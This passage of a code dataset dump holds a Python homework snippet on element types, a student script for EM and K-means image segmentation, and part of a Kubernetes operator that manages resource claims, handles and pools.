Pulled from the my_list_type_names dictionary for the elements of my_list\n# 2) Simply a list of type descriptions for the elements of my_list\n# 3) The elements of my_list themselves\n# And then all of it is printed with the list(map(.... call\n'''\n\nmy_list_type_names = {None : \"empty value\", str : \"string\", int : \"integer\",\n                      float : \"floating-point number\", complex : \"complex number\",\n                      bool : \"boolean variable\", bytes : \"bytes value\",\n                      list : \"list\", set : \"set\", tuple : \"tuple\", dict : \"dictionary\"}\n\nlist(map(print, list(zip(list(map(lambda x: (my_list_type_names.get((type(x), None)[x is None]), 'some kind of nonsense')[my_list_type_names.get((type(x), None)[x is None]) is None], my_list)), list(map(type, my_list)), my_list))))\n\n'''\nI realize this looks unreadable, but in my view (though I may be wrong) it is exactly the kind of solution in the spirit of Python style\nfor those who do not yet know what a function is.\n\nTo make it clear that I worked through the assignment, here is one more example solution:\n\n# First variant.\nlist(map(print, list(zip(list(map(type, my_list)), my_list))))\n\nor this\n\n# Second variant. With insertions in human language.\ncount = 0\nfor el in my_list:\n    type_custom_name = 'some kind of nonsense'\n    if el is None:\n        type_custom_name = \"empty value\"\n    elif type(el) is str:\n        type_custom_name = \"string\"\n    elif type(el) is int:\n        type_custom_name = \"integer\"\n    elif type(el) is float:\n        type_custom_name = \"floating-point number\"\n    elif type(el) is complex:\n        type_custom_name = \"complex number\"\n    elif type(el) is bool:\n        type_custom_name = \"boolean variable\"\n    elif type(el) is bytes:\n        type_custom_name = \"bytes value\"\n    elif type(el) is list:\n        type_custom_name = \"list\"\n    elif type(el) is set:\n        type_custom_name = \"set\"\n    elif type(el) is tuple:\n        type_custom_name = \"tuple\"\n    elif type(el) is dict:\n        type_custom_name = \"dictionary\"\n\n    print(f'{count}) {type_custom_name}: {el}')\n    count += 1\n'''","sub_path":"I четверть/Основы языка Python (Вебинар)/Lesson-2/hw_2_1.py","file_name":"hw_2_1.py","file_ext":"py","file_size_in_byte":3610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"331182199","text":"\"\"\"\n-*- coding: utf-8 -*-\n@author: Kuang Hao\n\"\"\"\nimport numpy as np\nimport cv2 # opencv: https://pypi.python.org/pypi/opencv-python\nfrom scipy.stats import multivariate_normal\n\ndef read_data(filename, is_RGB, visualize=False, save=False, save_name=None):\n# read the text data file\n# data, image = read_data(filename, is_RGB) read the data file named\n# filename. Return the data matrix with same shape as data in the file.\n# If is_RGB is False, the data will be regarded as Lab and converted to\n# RGB format to visualise and save.\n#\n# data, image = read_data(filename, is_RGB, visualize)\n# If visualize is True, the data will be shown. Default value is False.\n#\n# data, image = read_data(filename, is_RGB, visualize, save)\n# If save is True, the image will be saved in a jpg image with the same name\n# as the text filename. 
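\n# (Input format note, inferred from the parsing code: each line of the text\n# file reads \"col row v1 v2 ...\", whitespace separated; the col/row values on\n# the last line determine the image dimensions.)\n#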
Default value is False.\n#\n# data, image = read_data(filename, is_RGB, visualize, save, save_name) \n# The image filename.\n#\n# Example: data, image = read_data(\"1_noise.txt\", True)\n# Example: data, image = read_data(\"cow.txt\", False, True, True, \"segmented_cow.jpg\")\n\n with open(filename, \"r\") as f:\n lines = f.readlines()\n\n data = []\n\n for line in lines:\n data.append(list(map(float, line.split(\" \"))))\n\n data = np.asarray(data).astype(np.float32)\n\n N, D = data.shape\n\n cols = int(data[-1, 0] + 1)\n rows = int(data[-1, 1] + 1)\n channels = D - 2\n img_data = data[:, 2:]\n\n # In numpy, transforming 1d array to 2d is in row-major order, which is different from the way image data is organized.\n image = np.reshape(img_data, [cols, rows, channels]).transpose((1, 0, 2))\n\n if visualize:\n if channels == 1:\n # for visualizing grayscale image\n cv2.imshow(\"\", image)\n else:\n # for visualizing RGB image\n cv2.imshow(\"\", cv2.cvtColor(image, cv2.COLOR_Lab2BGR))\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n if save:\n if save_name is None:\n save_name = filename[:-4] + \".jpg\"\n assert save_name.endswith(\".jpg\") or save_name.endswith(\".png\"), \"Please specify the file type in suffix in 'save_name'!\"\n\n if channels == 1:\n # for saving grayscale image\n cv2.imwrite(save_name, image)\n else:\n # for saving RGB image\n cv2.imwrite(save_name, (cv2.cvtColor(image, cv2.COLOR_Lab2BGR) * 255).astype(np.uint8))\n\n if not is_RGB:\n image = cv2.cvtColor(image, cv2.COLOR_Lab2RGB)\n\n return data, image\n\ndef write_data(data, filename):\n# write the matrix into a text file\n# write_data(data, filename) write 2d matrix data into a text file named\n# filename.\n#\n# Example: write_data(data, \"cow.txt\")\n\n lines = []\n for i in range(len(data)):\n lines.append(\" \".join([str(int(data[i, 0])), str(int(data[i, 1]))] + [\"%.6f\" % v for v in data[i, 2:]]) + \"\\n\")\n\n with open(filename, \"w\") as f:\n f.writelines(lines)\n\ndef Kmeans(obs_data,cluster,epsilon):\n # returns matrix r: expressing which observed data point belongs to which cluster\n #vectors cluster: mean vector of each cluster\n N = len(obs_data)\n K = len(cluster)\n tmp = np.ones(cluster.shape)\n\n def Astep(obs_data,cluster):\n #Assignment step\n r = np.zeros((N,K))\n min_ix = np.argmin(np.array([[np.linalg.norm(x-mu) for mu in cluster] for x in obs_data]),axis = 1)\n r[np.arange(N),min_ix] = 1\n return r\n\n def Ustep(obs_data,r):\n #Update step\n Nk= np.sum(r,axis=0)\n Nk[Nk==0]=1\n cluster = np.array([np.sum([r[n, k] * obs_data[n] for n in range(N)], axis=0) / Nk[k] for k in range(K)])\n return cluster\n\n while (np.abs((cluster - tmp))>epsilon).all():\n tmp = cluster.copy()\n r = Astep(obs_data,cluster)\n cluster = Ustep(obs_data,r)\n return np.reshape(cluster,(2,3))\n\n\ndef EM_algorithm(animal):\n # Input: file = file name to open\n data,image = read_data(animal + \".txt\",True)\n N = len(data)\n d = data.shape[-1] - 2\n obs_data = data[:,2:].reshape(N,d,1)\n mus = np.random.randn(2,d,1)\n X = np.reshape(image, (image.shape[0] * image.shape[1], image.shape[2]))\n clust = Kmeans(obs_data,mus,1e-5)\n # mean value to compute multivariate normal distribution\n mean1 = clust[1]\n mean2 = clust[0]\n # Threshold\n eps = 0.5 \n # covariance to compute multivariate normal distribution\n cov1 = np.cov(np.asarray([[13, 20, 29], [13, 23, 37], [13, 23, 29]]))\n\n cov2 = np.cov(np.asarray([[9, -58, 7], [8, -7, 10], [6, -4, 6]]))\n # mixing co-efficient\n mix1 = 0.4 \n mix2 = 0.6\n # number of samples\n N = 
image.shape[0] * image.shape[1]\n\n    log_likelihoods = []\n\n    print(\"EM algorithm for: \"+str(animal))\n\n    # Start EM algorithm\n    while True:\n        N1 = 0\n        N2 = 0\n        resp1_list = []\n        resp2_list = []\n        #accumulate as numpy vectors (a plain list would be extended, not summed, by +=)\n        mu_sum1 = np.zeros(3)\n        mu_sum2 = np.zeros(3)\n\n        for y in image:\n            for x in y:\n                prob1 = multivariate_normal.pdf(x, mean=mean1, cov=cov1, allow_singular=True) # gaussian density 1\n\n                prob2 = multivariate_normal.pdf(x, mean=mean2, cov=cov2, allow_singular=True) # gaussian density 2\n\n                Numerator1 = mix1 * prob1\n                Numerator2 = mix2 * prob2\n\n                denom = Numerator1 + Numerator2\n                #responsibility for 1st cluster\n                resp1 = Numerator1 / denom\n                #responsibility for 2nd cluster\n                resp2 = Numerator2 / denom\n\n                resp1_list.append(resp1)\n                resp2_list.append(resp2)\n                mu_sum1 += resp1 * x\n                mu_sum2 += resp2 * x\n\n                N1 += resp1\n                N2 += resp2\n\n        # Update mean values\n        mu_new1 = mu_sum1 / N1\n        mu_new2 = mu_sum2 / N2\n\n        var_1 = np.zeros((3, 3))\n        var_2 = np.zeros((3, 3))\n\n        i = 0\n        for y in image:\n            for x in y:\n                var_1 += resp1_list[i] * np.outer((x - mu_new1), (x - mu_new1))\n                var_2 += resp2_list[i] * np.outer((x - mu_new2), (x - mu_new2))\n                i = i + 1\n        # Update covariances\n        var_new1 = var_1 / N1\n        var_new2 = var_2 / N2\n        # Update mix co-efficients\n        mix_new1 = N1 / N\n        mix_new2 = N2 / N\n\n        mean1 = mu_new1\n        mean2 = mu_new2\n\n        cov1 = var_new1\n        cov2 = var_new2\n\n        mix1 = mix_new1\n        mix2 = mix_new2\n        #Calculate Log Likelihood\n        ll = 0\n        sumList=[]\n        for y in image:\n            for x in y:\n                prob1 = multivariate_normal.pdf(x, mu_new1, var_new1, allow_singular=True)\n\n                prob2 = multivariate_normal.pdf(x, mu_new2, var_new2, allow_singular=True)\n\n                #mixture density for this pixel (named so the built-in sum is not shadowed)\n                mix_prob = (mix_new1 * prob1) + (mix_new2 * prob2)\n                sumList.append(np.log(mix_prob))\n\n        ll = np.sum(np.asarray(sumList))\n\n\n        log_likelihoods.append(ll)\n\n        if len(log_likelihoods) < 2: continue\n        if np.abs(ll - log_likelihoods[-2]) < eps: break\n        #Break loop if log likelihoods don't change more than threshold over 2 iterations\n\n    print(\"End iteration for: \" + str(animal))\n\n    #Write to File\n    back_data = data.copy()\n    front_data = data.copy()\n    mask_data = data.copy()\n\n    for i in range(len(data)):\n\n        cell = data[i]\n        point = [cell[2], cell[3], cell[4]]\n        prob1 = multivariate_normal.pdf(point, mean=mean1, cov=cov1, allow_singular=True)\n\n        resp1 = mix1 * prob1\n        prob2 = multivariate_normal.pdf(point, mean=mean2, cov=cov2, allow_singular=True)\n        resp2 = mix2 * prob2\n\n        #normalize with the denominator computed once, before either value is overwritten\n        total = resp1 + resp2\n        resp1 = resp1/total\n        resp2 = resp2/total\n\n\n        if (resp1 < resp2):\n            back_data[i][2] = back_data[i][3] = back_data[i][4] = 0\n            mask_data[i][2] = mask_data[i][3] = mask_data[i][4] = 0\n\n        else:\n            front_data[i][2] = front_data[i][3] = front_data[i][4] = 0\n            mask_data[i][2] = 100\n            mask_data[i][3] = mask_data[i][4] = 0\n\n    data_process(back_data, front_data, mask_data, animal)\n    print(\"Finish: \"+str(animal))\n\ndef data_process(data1, data2, data3, filename):\n    # Write and save data for background, foreground and mask\n    write_data(data1,\"output/\" + str(filename) + \"_back.txt\")\n    read_data(\"output/\" + str(filename) + \"_back.txt\", False, save=True, save_name=\"output/\"+str(filename)+\"_background.jpg\")\n    \n    write_data(data2,\"output/\" + str(filename) + \"_fore.txt\")\n    read_data(\"output/\" + str(filename) + \"_fore.txt\", False, save=True, save_name=\"output/\"+str(filename)+\"_foreground.jpg\")\n\n    write_data(data3,\"output/\" + str(filename) + \"_mask.txt\")\n    read_data(\"output/\" + str(filename) + \"_mask.txt\", False, save=True, 
save_name=\"output/\"+str(filename)+\"_masked.jpg\")\n\n\ndef main():\n EM_algorithm(\"cow\")\n EM_algorithm(\"fox\")\n EM_algorithm(\"owl\")\n EM_algorithm(\"zebra\")\n\nif __name__ == \"__main__\":\n main()","sub_path":"EM/ImgSegment.py","file_name":"ImgSegment.py","file_ext":"py","file_size_in_byte":9073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"233008607","text":"#!/usr/bin/env python\n\nimport copy\nimport datetime\nimport gpte.kubeoperative\nimport json\nimport kopf\nimport kubernetes\nimport openapi_schema_validator\nimport os\nimport prometheus_client\nimport re\nimport threading\nimport time\n\nfrom gpte.util import defaults_from_schema, dict_merge, recursive_process_template_strings\n\n@kopf.on.startup()\ndef configure(settings: kopf.OperatorSettings, **_):\n # Disable scanning for CustomResourceDefinitions\n settings.scanning.disabled = True\n\nko = gpte.kubeoperative.KubeOperative(\n operator_domain = os.environ.get('OPERATOR_DOMAIN', 'poolboy.gpte.redhat.com')\n)\nproviders = {}\nprovider_init_delay = int(os.environ.get('PROVIDER_INIT_DELAY', 10))\nstart_time = time.time()\n\npool_management_lock = threading.Lock()\n\ndef add_finalizer_to_handle(handle, logger):\n handle_meta = handle['metadata']\n handle_namespace = handle_meta['namespace']\n handle_name = handle_meta['name']\n ko.custom_objects_api.patch_namespaced_custom_object(\n ko.operator_domain, ko.version, handle_namespace, 'resourcehandles', handle_name,\n { 'metadata': { 'finalizers': [ko.operator_domain] } }\n )\n\ndef add_finalizer_to_pool(pool, logger):\n pool_meta = pool['metadata']\n pool_namespace = pool_meta['namespace']\n pool_name = pool_meta['name']\n ko.custom_objects_api.patch_namespaced_custom_object(\n ko.operator_domain, ko.version, pool_namespace, 'resourcepools', pool_name,\n { 'metadata': { 'finalizers': [ko.operator_domain] } }\n )\n\ndef bind_handle_to_claim(handle, claim, logger):\n claim_meta = claim['metadata']\n claim_namespace = claim_meta['namespace']\n claim_name = claim_meta['name']\n handle_meta = handle['metadata']\n handle_name = handle_meta['name']\n pool_ref = handle['spec'].get('resourcePool')\n\n logger.info(\n 'binding ResourceHandle %s to RsourceClaim %s in %s',\n handle_name, claim_name, claim_namespace\n )\n\n handle = ko.custom_objects_api.patch_namespaced_custom_object(\n ko.operator_domain, ko.version, ko.operator_namespace, 'resourcehandles', handle_name,\n {\n 'metadata': {\n 'labels': {\n ko.operator_domain + '/resource-claim-name': claim_name,\n ko.operator_domain + '/resource-claim-namespace': claim_namespace\n }\n },\n 'spec': {\n 'resourceClaim': {\n 'apiVersion': ko.api_version,\n 'kind': 'ResourceClaim',\n 'name': claim_name,\n 'namespace': claim_namespace\n }\n }\n }\n )\n\n if pool_ref:\n manage_pool_by_ref(pool_ref, logger)\n\n return handle\n\ndef create_handle_for_claim(claim, logger):\n \"\"\"\n Create resoruce handle for claim, called after claim is validated and failed\n to match an available handle.\n \"\"\"\n claim_name = claim['metadata']['name']\n claim_namespace = claim['metadata']['namespace']\n claim_resource_statuses = claim['status']['resources']\n\n resources = []\n for i, claim_resource in enumerate(claim['spec']['resources']):\n resources.append({\n 'provider': claim_resource_statuses[i]['provider'],\n 'template': claim_resource['template']\n })\n\n return ko.custom_objects_api.create_namespaced_custom_object(\n ko.operator_domain, ko.version, ko.operator_namespace, 
'resourcehandles',\n {\n 'apiVersion': ko.api_version,\n 'kind': 'ResourceHandle',\n 'metadata': {\n 'finalizers': [ ko.operator_domain ],\n 'generateName': 'guid-',\n 'labels': {\n ko.operator_domain + '/resource-claim-name': claim_name,\n ko.operator_domain + '/resource-claim-namespace': claim_namespace\n }\n },\n 'spec': {\n 'resourceClaim': {\n 'apiVersion': ko.api_version,\n 'kind': 'ResourceClaim',\n 'name': claim_name,\n 'namespace': claim_namespace\n },\n 'resources': resources\n }\n }\n )\n\ndef create_handle_for_pool(pool, logger):\n pool_meta = pool['metadata']\n pool_spec = pool['spec']\n pool_namespace = pool_meta['namespace']\n pool_name = pool_meta['name']\n\n return ko.custom_objects_api.create_namespaced_custom_object(\n ko.operator_domain, ko.version, ko.operator_namespace, 'resourcehandles',\n {\n 'apiVersion': ko.api_version,\n 'kind': 'ResourceHandle',\n 'metadata': {\n 'finalizers': [\n ko.operator_domain\n ],\n 'generateName': 'guid-',\n 'labels': {\n ko.operator_domain + '/resource-pool-name': pool_name,\n ko.operator_domain + '/resource-pool-namespace': pool_namespace\n }\n },\n 'spec': {\n 'resourcePool': {\n 'apiVersion': ko.api_version,\n 'kind': 'ResourcePool',\n 'name': pool_name,\n 'namespace': pool_namespace\n },\n 'resources': pool_spec['resources']\n }\n }\n )\n\ndef delete_resource_handle(name, logger):\n try:\n ko.custom_objects_api.delete_namespaced_custom_object(\n ko.operator_domain, ko.version, ko.operator_namespace, 'resourcehandles', name\n )\n except kubernetes.client.rest.ApiException as e:\n if e.status != 404:\n raise\n\ndef delete_unbound_handles_for_pool(pool, logger):\n pool_meta = pool['metadata']\n pool_name = pool_meta['name']\n for handle in get_unbound_handles_for_pool(pool_name, logger):\n handle_meta = handle['metadata']\n handle_name = handle_meta['name']\n ko.custom_objects_api.delete_namespaced_custom_object(\n ko.operator_domain, ko.version, ko.operator_namespace, 'resourcehandles', handle_name\n )\n\ndef get_claim_for_handle(handle, logger):\n if 'resourceClaim' not in handle['spec']:\n return None\n\n claim_ref = handle['spec']['resourceClaim']\n claim_name = claim_ref['name']\n claim_namespace = claim_ref['namespace']\n try:\n return ko.custom_objects_api.get_namespaced_custom_object(\n ko.operator_domain, ko.version, claim_namespace,\n 'resourceclaims', claim_name\n )\n except kubernetes.client.rest.ApiException as e:\n if e.status == 404:\n return None\n else:\n raise\n\ndef get_requester_from_namespace(namespace):\n resource_claim_namespace = ko.core_v1_api.read_namespace(namespace)\n requester_user_name = resource_claim_namespace.metadata.annotations.get(\n 'openshift.io/requester', None\n )\n if not requester_user_name:\n return None, None\n\n requester_user = requester_identity = None\n try:\n requester_user = ko.custom_objects_api.get_cluster_custom_object(\n 'user.openshift.io', 'v1', 'users', requester_user_name\n )\n if requester_user.get('identities', None):\n requester_identity = ko.custom_objects_api.get_cluster_custom_object(\n 'user.openshift.io', 'v1', 'identities', requester_user['identities'][0]\n )\n except kubernetes.client.rest.ApiException as e:\n if e.status not in (404, 422):\n raise\n\n return requester_identity, requester_user\n\ndef get_resource_handle(name, logger):\n try:\n return ko.custom_objects_api.get_namespaced_custom_object(\n ko.operator_domain, ko.version, ko.operator_namespace, 'resourcehandles', name\n )\n except kubernetes.client.rest.ApiException as e:\n if e.status == 404:\n return 
None\n else:\n raise\n\ndef get_unbound_handles_for_pool(pool_name, logger):\n return ko.custom_objects_api.list_namespaced_custom_object(\n ko.operator_domain, ko.version, ko.operator_namespace, 'resourcehandles',\n label_selector='{0}/resource-pool-name={1},!{0}/resource-claim-name'.format(\n ko.operator_domain, pool_name\n )\n ).get('items', [])\n\ndef log_claim_event(claim, logger, msg):\n logger.info(\n \"ResourceClaim %s in %s: %s\",\n claim['metadata']['name'],\n claim['metadata']['namespace'],\n msg\n )\n # FIXME - Create event for claim\n\ndef log_handle_event(handle, logger, msg):\n logger.info(\n \"ResourceHandle %s: %s\",\n handle['metadata']['name'],\n msg\n )\n # FIXME - Create event for handle\n\ndef manage_claim(claim, logger):\n \"\"\"\n Called on each ResourceClaim event\n \"\"\"\n claim_status = claim.get('status', None)\n if not claim_status:\n manage_claim_create(claim, logger)\n return\n\n annotations = claim['metadata'].get('annotations', {})\n if ko.operator_domain + '/resource-claim-init-timestamp' not in annotations:\n manage_claim_init(claim, logger)\n elif validate_claim(claim, logger):\n if 'resourceHandle' not in claim_status:\n manage_claim_bind(claim, logger)\n else:\n manage_claim_update(claim, logger)\n\ndef manage_claim_bind(claim, logger):\n \"\"\"\n Called on claim event if ResourceClaim is not bound to a ResourceHandle\n \"\"\"\n handle = match_handle_to_claim(claim, logger)\n if handle:\n bind_handle_to_claim(handle, claim, logger)\n else:\n handle = create_handle_for_claim(claim, logger)\n\n claim_meta = claim['metadata']\n handle_meta = handle['metadata']\n handle_name = handle_meta['name']\n ko.custom_objects_api.patch_namespaced_custom_object_status(\n ko.operator_domain, ko.version, claim_meta['namespace'], 'resourceclaims', claim_meta['name'],\n {\n 'status': {\n 'resourceHandle': {\n 'apiVersion': ko.api_version,\n 'kind': 'ResourceHandle',\n 'name': handle_name,\n 'namespace': handle_meta['namespace']\n }\n }\n }\n )\n\n log_claim_event(\n claim, logger, 'Bound ResourceHandle ' + handle_name\n )\n\ndef manage_claim_create(claim, logger):\n \"\"\"\n Called on ch claim event if the claim does not have a status\n This method will attempt to match ResourceProviders to each resource\n for the claim and set the names of the resource providers in the\n status.\n \"\"\"\n claim_meta = claim['metadata']\n claim_spec = claim['spec']\n\n resources = claim_spec.get('resources', None)\n if not resources:\n log_claim_event(claim, logger, 'no resources found')\n return\n\n resource_providers = []\n for i, resource in enumerate(resources):\n # Use specified provider if given\n provider_name = resource.get('provider', {}).get('name')\n if provider_name:\n provider = ResourceProvider.find_provider_by_name(provider_name)\n if not provider:\n log_claim_event(\n claim, logger, 'ResourceProvider {} not found'.format(provider_name)\n )\n return\n resource_providers.append(provider)\n elif 'template' in resource:\n provider = ResourceProvider.find_provider_by_template_match(resource['template'])\n if not provider:\n log_claim_event(\n claim, logger,\n 'Unable to match spec.resources[{}].template to ResourceProvider'.format(i)\n )\n return\n resource_providers.append(provider)\n\n ko.custom_objects_api.patch_namespaced_custom_object_status(\n ko.operator_domain, ko.version, claim_meta['namespace'], 'resourceclaims', claim_meta['name'],\n {\n 'status': {\n 'resources': [{\n 'provider': {\n 'apiVersion': ko.api_version,\n 'kind': 'ResourceProvider',\n 'name': 
provider.name,\n                        'namespace': provider.namespace\n                    },\n                    'resource': None\n                } for provider in resource_providers]\n            }\n        }\n    )\n\ndef manage_claim_deleted(claim, logger):\n    claim_meta = claim['metadata']\n    claim_name = claim_meta['name']\n    claim_namespace = claim_meta['namespace']\n    handle_ref = claim.get('status', {}).get('resourceHandle', None)\n\n    if handle_ref:\n        handle_name = handle_ref['name']\n        logger.info('Propagating delete to ResourceHandle %s', handle_name)\n        delete_resource_handle(handle_name, logger)\n\ndef manage_claim_init(claim, logger):\n    \"\"\"\n    Called after claim has resources matched to providers but\n    resource-claim-init-timestamp annotation is not yet set.\n    \"\"\"\n    claim_resources = claim['spec'].get('resources', [])\n    claim_status_resources = claim['status'].get('resources', [])\n    claim_resources_update = []\n    update = {\n        \"metadata\": {\n            \"annotations\": {\n                ko.operator_domain + '/resource-claim-init-timestamp':\n                    datetime.datetime.utcnow().strftime('%FT%TZ')\n            }\n        },\n        'spec': { 'resources': claim_resources_update }\n    }\n    for i, resource in enumerate(claim_resources):\n        try:\n            claim_status_resource = claim_status_resources[i]\n            provider_ref = claim_status_resource['provider']\n            provider = ResourceProvider.find_provider_by_name(provider_ref['name'])\n            if not provider:\n                log_claim_event(\n                    claim, logger,\n                    \"Unable to find ResourceProvider \" + provider_ref['name']\n                )\n                return\n            else:\n                claim_resources_update.append({\n                    'provider': provider_ref,\n                    'template': provider.resource_claim_template_defaults(\n                        resource_claim = claim,\n                        resource_index = i\n                    )\n                })\n\n        except IndexError:\n            logger.warning('ResourceClaim has more resources in spec than resourceProviders in status!')\n            return\n\n    ko.patch_resource(\n        claim, update, [\n            # Update anything in metadata on init\n            { 'pathMatch': '/metadata/.*', 'allowedOps': ['add', 'replace'] },\n            # Update anything in resources[].provider\n            { 'pathMatch': '/spec/resources/[0-9]+/provider(/.*)?', 'allowedOps': ['add', 'replace'] },\n            # Only process default overrides in template\n            { 'pathMatch': '/spec/resources/[0-9]+/template(/.*)?', 'allowedOps': ['add'] },\n        ]\n    )\n\ndef manage_claim_resource_delete(claim_namespace, claim_name, resource, resource_index):\n    resource_kind = resource['kind']\n    resource_meta = resource['metadata']\n    resource_name = resource_meta['name']\n    resource_namespace = resource_meta.get('namespace', None)\n    if resource_namespace:\n        ko.logger.info('ResourceClaim {} in {} lost resource {} {} in {}'.format(\n            claim_name, claim_namespace, resource_kind, resource_name, resource_namespace\n        ))\n    else:\n        ko.logger.info('ResourceClaim {} in {} lost resource {} {}'.format(\n            claim_name, claim_namespace, resource_kind, resource_name\n        ))\n    try:\n        claim = ko.custom_objects_api.get_namespaced_custom_object(\n            ko.operator_domain, ko.version, claim_namespace, 'resourceclaims', claim_name\n        )\n        status_resources = claim['status']['resources']\n        status_resource = status_resources[resource_index].get('state', None)\n\n        if status_resource \\\n        and status_resource['metadata']['name'] == resource_name \\\n        and status_resource['metadata']['namespace'] == resource_namespace:\n            status_resources[resource_index]['state'] = resource\n            ko.custom_objects_api.patch_namespaced_custom_object_status(\n                ko.operator_domain, ko.version, claim_namespace, 'resourceclaims', claim_name,\n                { 'status': { 'resources': status_resources } }\n            )\n    except (IndexError, KeyError):\n        pass\n    except kubernetes.client.rest.ApiException as e:\n        if e.status != 404:\n            
raise\n\ndef manage_claim_resource_update(claim_namespace, claim_name, resource, resource_index):\n resource_kind = resource['kind']\n resource_meta = resource['metadata']\n resource_name = resource_meta['name']\n resource_namespace = resource_meta.get('namespace', None)\n if resource_namespace:\n ko.logger.info('ResourceClaim {} in {} resource status change for {} {} in {}'.format(\n claim_name, claim_namespace, resource_kind, resource_name, resource_namespace\n ))\n else:\n ko.logger.info('ResourceClaim {} in {} resource status change for {} {}'.format(\n claim_name, claim_namespace, resource_kind, resource_name\n ))\n\n try:\n claim = ko.custom_objects_api.get_namespaced_custom_object(\n ko.operator_domain, ko.version, claim_namespace, 'resourceclaims', claim_name\n )\n status_resources = claim['status']['resources']\n status_resource = status_resources[resource_index].get('state', None)\n\n if not status_resource or (\n status_resource['metadata']['name'] == resource_name and\n status_resource['metadata']['namespace'] == resource_namespace and\n status_resource != resource\n ):\n status_resources[resource_index]['state'] = resource\n ko.custom_objects_api.patch_namespaced_custom_object_status(\n ko.operator_domain, ko.version, claim_namespace, 'resourceclaims', claim_name,\n { 'status': { 'resources': status_resources } }\n )\n except (IndexError, KeyError):\n pass\n except kubernetes.client.rest.ApiException as e:\n if e.status == 404:\n ko.logger.info('ResourceClaim %s in %s not found', claim_name, claim_namespace)\n else:\n raise\n\ndef manage_claim_update(claim, logger):\n \"\"\"\n Called on each claim event once ResourceClaim is bound to a ResourceHandle\n\n Claim has already been validated. Propagate changes from claim to handle.\n \"\"\"\n handle_name = claim['status']['resourceHandle']['name']\n resource_handle = get_resource_handle(handle_name, logger)\n if not resource_handle:\n log_claim_event(\n claim, logger, 'ResourceHandle {} has been lost'.format(handle_name)\n )\n return\n\n have_update = False\n handle_resources = resource_handle['spec']['resources']\n for i, claim_resource in enumerate(claim['spec']['resources']):\n handle_resource = handle_resources[i]\n if handle_resource['template'] != claim_resource['template']:\n handle_resource['template'] = claim_resource['template']\n have_update = True\n\n if have_update:\n ko.custom_objects_api.patch_namespaced_custom_object(\n ko.operator_domain, ko.version, ko.operator_namespace, 'resourcehandles', handle_name,\n { 'spec': { 'resources': handle_resources } }\n )\n\ndef manage_handle(handle, logger):\n \"\"\"\n Called on all ResourceHandle events except delete\n \"\"\"\n handle_meta = handle['metadata']\n handle_name = handle_meta['name']\n if 'deletionTimestamp' in handle['metadata']:\n manage_handle_pending_delete(handle, logger)\n return\n elif 'finalizers' not in handle_meta:\n add_finalizer_to_handle(handle, logger)\n return\n elif 'resourceClaim' in handle['spec']:\n claim = get_claim_for_handle(handle, logger)\n if not claim:\n delete_resource_handle(handle_name, logger)\n return\n else:\n claim = None\n\n providers = []\n handle_resources = handle['spec']['resources']\n for handle_resource in handle_resources:\n provider_name = handle_resource['provider']['name']\n provider = ResourceProvider.find_provider_by_name(provider_name)\n if provider:\n providers.append(provider)\n else:\n log_handle_event(handle, logger, 'Unable to find ResourceProvider ' + provider_name)\n return\n\n have_handle_update = False\n 
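#The loop below renders each resource template into a concrete definition,\n    #records its reference on the handle, and queues definitions that do not\n    #exist yet so they are created after the handle has been patched.\n    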
resources_to_create = []\n    for i, handle_resource in enumerate(handle_resources):\n        provider = providers[i]\n\n        if provider.resource_requires_claim and not claim:\n            continue\n\n        resource_definition = provider.resource_definition_from_template(\n            handle, claim, i, logger\n        )\n        start_resource_watch(resource_definition)\n\n        resource_api_version = resource_definition['apiVersion']\n        resource_kind = resource_definition['kind']\n        resource_name = resource_definition['metadata']['name']\n        resource_namespace = resource_definition['metadata'].get('namespace', None)\n\n        reference = {\n            'apiVersion': resource_definition['apiVersion'],\n            'kind': resource_definition['kind'],\n            'name': resource_definition['metadata']['name']\n        }\n        if 'namespace' in resource_definition['metadata']:\n            reference['namespace'] = resource_definition['metadata']['namespace']\n\n        if reference != handle_resource.get('reference', None):\n            have_handle_update = True\n            handle_resource['reference'] = reference\n\n        resource = ko.get_resource(\n            api_version = resource_api_version,\n            kind = resource_kind,\n            name = resource_name,\n            namespace = resource_namespace\n        )\n        if hasattr(resource, 'to_dict'):\n            resource = resource.to_dict()\n\n        if resource:\n            provider.update_resource(handle, resource, resource_definition, logger)\n        else:\n            resources_to_create.append(resource_definition)\n\n    if have_handle_update:\n        try:\n            handle = ko.custom_objects_api.patch_namespaced_custom_object(\n                ko.operator_domain, ko.version, ko.operator_namespace, 'resourcehandles', handle_name,\n                { 'spec': { 'resources': handle_resources } }\n            )\n        except kubernetes.client.rest.ApiException as e:\n            if e.status != 404:\n                raise\n\n    for resource_definition in resources_to_create:\n        resource_definition['metadata']['annotations'][ko.operator_domain + '/resource-handle-version'] = \\\n            handle['metadata']['resourceVersion']\n        ko.create_resource(resource_definition)\n\ndef manage_handle_deleted(handle, logger):\n    handle_meta = handle['metadata']\n    handle_name = handle_meta['name']\n    logger.info('ResourceHandle %s deleted', handle_name)\n\n    claim_ref = handle['spec'].get('resourceClaim')\n    pool_ref = handle['spec'].get('resourcePool')\n\n    # Deleting an unclaimed handle from a pool may require a replacement\n    if pool_ref and not claim_ref:\n        manage_pool_by_ref(pool_ref, logger)\n\ndef manage_handle_lost_resource(handle_name, resource, resource_index):\n    try:\n        handle = ko.custom_objects_api.get_namespaced_custom_object(\n            ko.operator_domain, ko.version, ko.operator_namespace,\n            'resourcehandles', handle_name\n        )\n        if 'deletionTimestamp' not in handle['metadata']:\n            return\n\n        reference = handle['spec']['resources'][resource_index]['reference']\n        if reference['apiVersion'] == resource['apiVersion'] \\\n        and reference['kind'] == resource['kind'] \\\n        and reference['name'] == resource['metadata']['name'] \\\n        and reference['namespace'] == resource['metadata']['namespace']:\n            #build one empty entry per resource up to and including resource_index\n            resources_update = [{} for i in range(resource_index + 1)]\n            resources_update[resource_index] = {'reference': None}\n            ko.custom_objects_api.patch_namespaced_custom_object(\n                ko.operator_domain, ko.version, ko.operator_namespace,\n                'resourcehandles', handle_name,\n                { 'spec': { 'resources': resources_update } }\n            )\n    except IndexError:\n        pass\n    except KeyError:\n        pass\n    except kubernetes.client.rest.ApiException as e:\n        if e.status != 404:\n            raise\n\ndef manage_handle_pending_delete(handle, logger):\n    for resource in handle['spec']['resources']:\n        reference = resource.get('reference', None)\n        if reference:\n            
